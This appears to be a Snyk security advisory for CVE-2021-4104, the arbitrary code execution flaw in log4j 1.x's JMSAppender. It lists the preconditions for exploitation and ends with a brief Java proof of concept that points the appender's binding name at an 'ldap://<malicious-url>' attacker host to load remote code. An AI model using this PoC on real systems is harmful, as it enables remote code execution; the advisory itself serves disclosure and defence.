Arbitrary Code Execution Affecting log4j:log4j package, versions [0,]
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JAVA-LOG4J-2316893
- published 13 Dec 2021
- disclosed 10 Dec 2021
- credit Unknown
Introduced: 10 Dec 2021
CVE-2021-4104 Open this link in a new tabHow to fix?
There is no fixed version for log4j:log4j.
Overview
log4j:log4j is a 1.x branch of the Apache Log4j project. Note: Log4j 1.x reached End of Life in 2015, and is no longer supported.
Affected versions of this package are vulnerable to Arbitrary Code Execution.
Note: Even though this vulnerability appears to be related to the log4j 2.x vulnerability, the 1.x branch of the module requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.
In order to leverage this vulnerability the following conditions must be met:
- The application has enabled
JMSAppender(or a class that extendsJMSAppender) - The attacker has access to directly modify the
TopicBindingNameorTopicConnectionFactoryBindingNameconfiguration variables - which is an unlikely scenario
If these conditions are met, log4j 1.x allows a lookup feature that does not protect against attacker-controlled LDAP and other JNDI related endpoints. Therefore, an attacker with access to the aforementioned configuration variables is able to execute arbitrary code when loaded from an LDAP server.
PoC
import org.apache.log4j.net.JMSAppender;
// ...
JMSAppender a = new JMSAppender();
a.setTopicConnectionFactoryBindingName("ldap://<malicious-url>");
// OR a.setTopicBindingName("ldap://<malicious-url>");
a.activateOptions();